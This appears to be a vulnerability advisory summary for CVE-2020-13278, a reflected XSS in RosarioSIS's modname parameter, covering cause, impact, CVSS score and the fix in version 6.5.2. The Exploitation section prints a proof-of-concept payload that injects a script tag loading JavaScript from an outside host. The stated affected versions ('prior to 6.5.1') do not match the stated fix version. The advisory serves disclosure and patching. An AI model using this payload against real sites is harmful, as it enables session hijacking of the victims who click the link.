CVE-2020-13278

Vulnerability

CVE-2020-13278 is a reflected Cross-Site Scripting (XSS) vulnerability in the RosarioSIS Student Information System, affecting versions prior to 6.5.1. The root cause lies in the PreparePHP_SELF.php component, which fails to properly URL-encode keys in GET parameters. This flaw allows an attacker to inject arbitrary JavaScript or HTML tags via a specially crafted modname parameter in the Modules.php script [1][2].

Exploitation

The attack is remotely exploitable without authentication, but requires user interaction (the victim must visit a malicious link). A proof-of-concept URL demonstrates how the attacker can break out of the existing HTML context by injecting a payload such as %22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E [3]. The vulnerability is triggered when the server reflects the unsanitized input back to the victim’s browser.

Impact

Successful exploitation can lead to session hijacking, enabling the attacker to execute arbitrary requests with the victim’s privileges (potentially admin-level access). The CVSS v3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) confirms low confidentiality and integrity impact, but the attack vector is network-based and can have significant consequences if an admin is targeted [1][3].

Mitigation

The issue was fixed in version 6.5.2 by applying _myURLEncode() to the key values in PreparePHP_SELF.php, as shown in the corresponding Git commit [2]. Users are strongly advised to update to RosarioSIS 6.5.2 or later. No known workarounds are documented.

References

• [1] NVD - CVE-2020-13278
• [2] GitLab Commit: Fix #282 XSS URL encode key
• [3] GitLab Issue: Reflected Cross-Site Scripting vulnerability